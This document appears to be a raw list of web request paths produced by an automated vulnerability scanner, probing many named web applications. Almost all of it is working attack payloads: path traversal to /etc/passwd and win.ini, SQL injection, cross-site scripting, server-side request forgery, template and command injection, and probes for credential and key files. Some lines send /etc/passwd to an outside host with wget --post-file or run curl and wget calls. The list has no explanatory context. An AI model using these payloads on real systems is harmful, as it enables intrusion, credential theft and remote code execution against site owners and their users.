/apisix/admin/migrate/export
/web
/web/
/web/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd
/web/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini
/web/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd
/web/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini
/web/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/web/%5C../ssl/yaws-key.pem
/web/%5cgoogle.com/evil.html
/web/%c0
/web/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/web/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/web/'
/web/(download)/etc/passwd
/web/(download)/tmp/poc.txt
/web/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
/web/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini
/web/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html
/web/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
/web/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini
/web/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/web/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/web/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/web/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/web/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/..%5c..%5c..%5c..%5c..%5cetc/passwd
/web/..%5c..%5c..%5c..%5cetc/passwd
/web/..%5c..%5c..%5cetc/passwd
/web/..%5c..%5cetc/passwd
/web/..%5cetc/passwd
/web/...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5C...%5Cwindows%5Cwin.ini
/web/....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5C....%5Cwindows%5Cwin.ini
/web/..../..../..../..../..../..../..../..../..../windows/win.ini
/web/.../.../.../.../.../.../.../.../.../windows/win.ini
/web/../../../../../../../../../../../../../etc/passwd
/web/../../../../../../../../windows/win.ini
/web/../../../../../../etc/passwd
/web/../../../..//etc/passwd
/web/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd
/web/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini
/web/..;/examples/jsp/index.html
/web/..;/examples/servlets/index.html
/web/..;/examples/websocket/index.xhtml
/web/..;/host-manager/html
/web/..;/manager/html
/web/..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
/web/./../../../../../../../../../../etc/passwd
/web/./../../../../../../../../../../windows/win.ini
/web/.//WEB-INF/classes/META-INF/microprofile-config.properties
/web/.circleci/config.yml
/web/.dbeaver/credentials-config.json
/web/.drone.yml
/web/.DS_Store
/web/.netrc
/web/.settings/rules.json?auth=FIREBASE_SECRET
/web/.wp-config.php.swp
/web///../app.js
/web///////../../../etc/passwd
/web//example.com
/web//netcore_get.cgi
/web/24s8yea94X9VbxTQvXbO7QZZO9v
/web/24s8ykAtb307k70NJgbDIweKSVn
/web/24sB55510B024XQ7t2KR7O18oC0?cmd=id
/web/24sB567PZwMINWxLihobZh7vPeF
/web/24sB58GVEHg9zQ9f2YBQ26ROQwv.php%5Cx0A
/web/24sB5BiMoWDlDX8R5p6zmHckIZN
/web/404
/web/404.php.bak
/web/?a=display&templateFile=README.md
/web/?aam-media=wp-config.php
/web/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
/web/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd
/web/?ajax-request=jnews
/web/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=
/web/?author=1
/web/?c=../../../../../../etc/passwd%00
/web/?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22
/web/?file=http://0177.0.0.1/etc/passwd
/web/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini
/web/?host=http://0177.0.0.1/server-status
/web/?id=nuclei%25{128*128}
/web/?layout=/etc/passwd
/web/?mdocs-img-preview=../../../wp-config.php
/web/?p=1
/web/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+
/web/?piereg_logout_url=true&redirect_to=https://example.com
/web/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E
/web/?q=node&destination=node
/web/?qtproxycall=http:/
/web/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E
/web/?s=index/index/index
/web/?u=http:///&href=http:///&action=http:///&host=&http_host=&email=root@&url=http:///&load=http:///&preview=http:///&target=http:///&proxy=http:///&from=http:///&src=http:///&ref=http:///&referrer=http:///
/web/?url=http://0177.0.0.1/server-status
/web/?wptouch_switch=desktop&redirect=https://example.com/
/web/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/web/?{alert(1)}
/web/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd
/web/access/config
/web/account/index.php
/web/action.php
/web/actions/authenticate.php
/web/actuator/configprops
/web/actuator/dump
/web/actuator/gateway/routes
/web/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
/web/actuator/metrics
/web/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E
/web/adfs/ls/idpinitiatedsignon.aspx
/web/adm/file.cgi?next_file=%2fetc%2fpasswd
/web/admin/
/web/admin/airflow/login
/web/admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd
/web/admin/index.php
/web/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd
/web/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=24s8kCXdlJW0PUyLPYJMlIpXTma.php&target=l1_Lw
/web/AdminTools/querybuilder/logon?framework=
/web/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)
/web/airflow.cfg
/web/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
/web/ajax/api/content_infraction/getIndexableContent
/web/ajax/networking/get_netcfg.php?iface=;curl%20http:///`whoami`;
/web/ajax/render/widget_tabbedcontainer_tab_panel
/web/ALFA_DATA/alfacgiapi/
/web/alfresco/api/-default-/public/cmis/versions/1.1/atom
/web/am/json/serverinfo/*
/web/am/UI/
/web/am/UI/Login
/web/am/XUI/
/web/am/XUI/Login
/web/analytics/saw.dll?bieehome&startPage=1
/web/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd
/web/apache.conf
/web/api/api-browser/
/web/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
/web/api/downloads?fileName=../../../../../../../../etc/passwd
/web/api/experimental/dags/example_trigger_target_dag/dag_runs
/web/api/experimental/dags/example_trigger_target_dag/paused/false
/web/api/experimental/latest_runs
/web/api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0
/web/api/experimental/test
/web/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcollaborator.net)
/web/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp
/web/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20
/web/api/snapshots
/web/api/users/admin/check
/web/api/v1/canal/config/1/1
/web/api/v1/cluster/summary
/web/api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name
/web/api/v4/ci/lint?include_merged_yaml=true
/web/apisix/admin/routes
/web/apisix/admin/user/login
/web/appliance/login.ns
/web/asd/../../../../../../../../etc/passwd
/web/assets../.git/config
/web/assets/app/something/services/AppModule.class/
/web/assets/data/usrimg/24s8kfvst9hzpb5tfyzimie9rss.php
/web/assets/file:%2f%2f/etc/passwd
/web/assets/php/upload.php
/web/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
/web/aura
/web/auth.php
/web/auth/check
/web/auth/login
/web/auth/newpassword
/web/auth/realms/master/clients-registrations/openid-connect
/web/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http:///
/web/auth/requestreset
/web/authorization.do
/web/axis/
/web/axis/happyaxis.jsp
/web/axis2-admin/login
/web/axis2-web/HappyAxis.jsp
/web/axis2/
/web/axis2/axis2-admin/login
/web/axis2/axis2-web/HappyAxis.jsp
/web/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php
/web/badging/badge_print_v0.php?tpl=../../../../../etc/passwd
/web/base/static/c:/windows/win.ini
/web/base_import/static/c:/windows/win.ini
/web/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=
/web/blog/wp-content/plugins/1-flash-gallery/
/web/boaform/admin/formTracert
/web/boafrm/formSysCmd
/web/boardDataWW.php
/web/bower.json
/web/bugs/verify.php?confirm_hash=&id=1
/web/carbon/admin/login.jsp
/web/carbon/generic/save_artifact_ajaxprocessor.jsp
/web/cas/v1/tickets/
/web/casa/nodes/thumbprints
/web/casmain.xgi
/web/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd
/web/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd
/web/cf-scripts/scripts/ajax/package/cfajax.js
/web/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/cfide-scripts/ajax/package/cfajax.js
/web/CFIDE/scripts/ajax/package/cfajax.js
/web/cfide/scripts/ajax/package/cfajax.js
/web/cfmx/CFIDE/scripts/ajax/package/cfajax.js
/web/cf_scripts/scripts/ajax/package/cfajax.js
/web/CF_SFSD/scripts/ajax/package/cfajax.js
/web/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
/web/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/web/cgi-bin/ALFA_DATA/alfacgiapi/
/web/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd
/web/cgi-bin/ck/domenu.cgi
/web/cgi-bin/file_transfer.cgi
/web/cgi-bin/jarrewrite.sh
/web/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/web/cgi-bin/login.cgi
/web/cgi-bin/login?LD_DEBUG=files
/web/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
/web/cgi-bin/mainfunction.cgi
/web/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd
/web/cgi-bin/nobody/Machine.cgi?action=get_capability
/web/cgi-bin/operator/fileread?READ.filePath=/etc/passwd
/web/cgi-bin/privatekey.pem
/web/cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users
/web/cgi-bin/slogin/login.py
/web/cgi-bin/status
/web/cgi-bin/supportInstaller
/web/cgi-bin/system_mgr.cgi?
/web/cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget
/web/cgi-bin/weblogin.cgi?username=admin';cat
/web/cgi-bin/webproc
/web/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth
/web/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
/web/clients/editclient.php?id=24s8kEyAZuKiDlcvS30yMhqBAtD&action=update
/web/cluster/cluster
/web/comm.php?id=../../../../../../../../../../etc/passwd
/web/common_page/login.html
/web/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00
/web/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1
/web/composer/send_email?to=PpNg@PpNg&url=http://
/web/conf
/web/config.php.bak
/web/configprops
/web/configuration.php-dist
/web/configurations
/web/confluence
/web/confluence/pages/createpage-entervariables.action
/web/confluence/pages/createpage-entervariables.action?SpaceKey=x
/web/conn.php.bak
/web/connect/register
/web/console-selfservice/SelfService.do
/web/content../.git/config
/web/context.json
/web/control/login
/web/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(xss)%3E
/web/controller/config
/web/controller/registry-clients
/web/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/web/counters
/web/cpqlogin.htm
/web/cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE
/web/crx/de/index.jsp
/web/cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences
/web/css../.git/config
/web/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini
/web/cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C
/web/dashboard/
/web/dashboardUser
/web/data?get=prodServerGen
/web/database.php.bak
/web/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd
/web/db.php.bak
/web/dbaas_monitor/login
/web/dbconsole/
/web/db_config.php.bak
/web/db_dump.php
/web/dc2/admin/auth.php
/web/debug/vars
/web/default.php.bak
/web/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448
/web/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample
/web/development.log
/web/device.rsp?opt=user&cmd=list
/web/dfshealth.html
/web/dfsms/
/web/dlibrary/null?oldfile=../../../../../../windows/win.ini&library=null
/web/DnnImageHandler.ashx?mode=file&url=http://
/web/doc/page/login.asp
/web/docpicker/internal_proxy/http/example.com
/web/document.php?modulepart=project&file=../../../../../../../etc/passwd
/web/download.php?file=../../../../../etc/passwd
/web/download.php?file=/etc/passwd
/web/druid/indexer/v1/sampler
/web/druid/indexer/v1/sampler?for=connect
/web/dump
/web/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))
/web/eam/vib?id=/etc/issue
/web/eam/vib?id=C:\Documents+and+Settings\All+Users\Application+Data\VMware\VMware+VirtualCenter\vcdb.properties
/web/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
/web/eam/vib?id=C:\ProgramData\VMware\VMware+VirtualCenter\vcdb.properties
/web/ebook/bookPerPub.php?pubid=4'
/web/EemAdminService/EemAdmin
/web/EMSWebClient/Login.aspx
/web/en/php/usb_sync.php
/web/etc/passwd
/web/events../.git/config
/web/examples/jsp/index.html
/web/examples/jsp/snp/snoop.jsp
/web/examples/servlets/index.html
/web/examples/websocket/index.xhtml
/web/external_content/retrieve/oembed?endpoint=http://&url=foo
/web/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..
/web/faces/javax.faces.resource/web.xml?loc=../WEB-INF
/web/favicon.ico
/web/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text
/web/file=C:%5CWindows%5Cwin.ini
/web/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd
/web/filemanager/upload.php
/web/fileserver/test.txt
/web/final/
/web/fiori
/web/flow/registries
/web/fmangersub?cpath=../../../../../../../etc/passwd
/web/footer.php.bak
/web/fpui/jsp/login.jsp
/web/fw.login.php
/web/gateway/routes
/web/general/status.html
/web/gespage/doDownloadData?file_name=../../../../../Windows/debug/NetSetup.log
/web/gespage/webapp/login.xhtml
/web/getFavicon?host=http://
/web/ghost/preview
/web/global-protect/login.esp
/web/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd
/web/graphql
/web/graph_realtime.php?action=init
/web/h2-console/
/web/happyaxis.jsp
/web/header.php.bak
/web/him/api/rest/V1.0/system/log/list?filePath=../
/web/homeaction.php
/web/host-manager/html
/web/hoteldruid/inizio.php
/web/http/index.php
/web/hub/
/web/hui/index.html
/web/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd
/web/images../.git/config
/web/images/..%2finfo.html
/web/Images/Remote?imageUrl=http://
/web/img../.git/config
/web/img/../../../../../../etc/passwd
/web/include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt
/web/include/nuclei.txt
/web/include/thumb.php?dir=.....///http/.....///config/config_db.php
/web/include/thumb.php?dir=http/.....///.....///config/config_db.php
/web/include/thumb.php?dir=http\\..\\..\\config\\config_db.php
/web/index
/web/index.do
/web/index.htm
/web/index.jsp
/web/index.php
/web/index.php.bak
/web/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
/web/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1
/web/index.php/login
/web/index.php/System/MailConnect/host//port/80/secure/
/web/index.php5
/web/index.php?g=g&m=Door&a=index&content=<?php%20phpinfo();
/web/index.php?id=50&file=../../../../../../../../../etc/passwd
/web/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test")
/web/index.php?m=member&f=login_save
/web/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
/web/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd
/web/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_canteen&controller=../../../../../etc/passwd%00
/web/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd
/web/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1
/web/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd
/web/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00
/web/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_imagebrowser&folder=../../../../etc/passwd
/web/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00
/web/index.php?option=com_jejob&view=../../../../../../etc/passwd%00
/web/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00
/web/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00
/web/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00
/web/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd
/web/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
/web/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd
/web/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd
/web/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00
/web/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00
/web/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00
/web/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00
/web/index.php?plot=;wget%20http:/
/web/index.php?rest_route=/whm/v3/themesettings
/web/index.php?s=/home/page/uploadImg
/web/index.php?s=/index/index/name/$%7B@phpinfo()%7D
/web/index.php?s=/install/index/index
/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(id)
/web/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ver)
/web/index.php?sl=../../../../../../../etc/passwd%00
/web/info/
/web/infusions/downloads/downloads.php?cat_id=${system(ls)}
/web/inizio.php
/web/install/includes/configure.php
/web/install/install.php?step=4
/web/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23
/web/integration/saveGangster.action
/web/interlib/report/ShowImage?localPath=etc/passwd
/web/invoker/EJBInvokerServlet/
/web/ioncube/loader-wizard.php
/web/iPages/i_login.asp
/web/irj/portal/fiori
/web/Items/RemoteSearch/Image?ImageUrl=http://&ProviderName=TheMovieDB
/web/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net
/web/jars/upload
/web/JavaScriptServlet
/web/javax.faces.resource/dynamiccontent.properties.xhtml
/web/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample
/web/jkstatus
/web/jkstatus;
/web/jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd
/web/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
/web/jolokia/read/getDiagnosticOptions
/web/jolokia/version
/web/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd
/web/js../.git/config
/web/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
/web/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::
/web/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
/web/kylin/api/admin/config
/web/lab.html?vpath=//example.com
/web/language/lang
/web/lcms/index.php
/web/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00
/web/LetsEncrypt/Index?fileName=/etc/passwd
/web/lib../.git/config
/web/lib///....//....//....//....//....//....//....//....//etc//passwd
/web/lib/crud/userprocess.php
/web/libraries/joomla/database/
/web/libs/granite/core/content/login/favicon.ico
/web/loader-wizard.php
/web/log/development.log
/web/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/web/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/web/login
/web/login.action
/web/login.aspx
/web/Login.htm
/web/login.htm
/web/login.php
/web/login.php.bak
/web/login.php/'%3E%3Csvg/onload=alert%6024s8Cx1tYDnMTM8dJ6o9OK2SBwO%60%3E
/web/login/
/web/loginLess/../../etc/passwd
/web/login_page.php
/web/logon.htm
/web/logon/LogonPoint/custom.html
/web/logon/LogonPoint/index.html
/web/logos_clients/1.php
/web/logs/development.log
/web/logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D
/web/lui/
/web/lumis/portal/controller/xml/PageControllerXml.jsp
/web/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
/web/mailingupgrade.php
/web/main.php.bak
/web/main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags
/web/maint/index.php?packages
/web/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00
/web/maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english
/web/maint/modules/home/index.php?lang=english|cat%20/etc/passwd
/web/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../
/web/manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
/web/manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064
/web/manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064
/web/manager/html
/web/manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../poc.txt&id=1
/web/mantis/verify.php?id=1&confirm_hash=
/web/mantisbt-2.3.0/verify.php?id=1&confirm_hash=
/web/mantisBT/verify.php?id=1&confirm_hash=
/web/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
/web/media../.git/config
/web/menu/neo
/web/menu/ss?sid=nsroot&username=nsroot&force_setup=1
/web/menu/stc
/web/meta
/web/metrics
/web/mgmt/shared/authn/login
/web/mgmt/tm/util/bash
/web/MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com
/web/mifs/c/d/android.html
/web/mifs/j_spring_security_check
/web/mifs/login.jsp
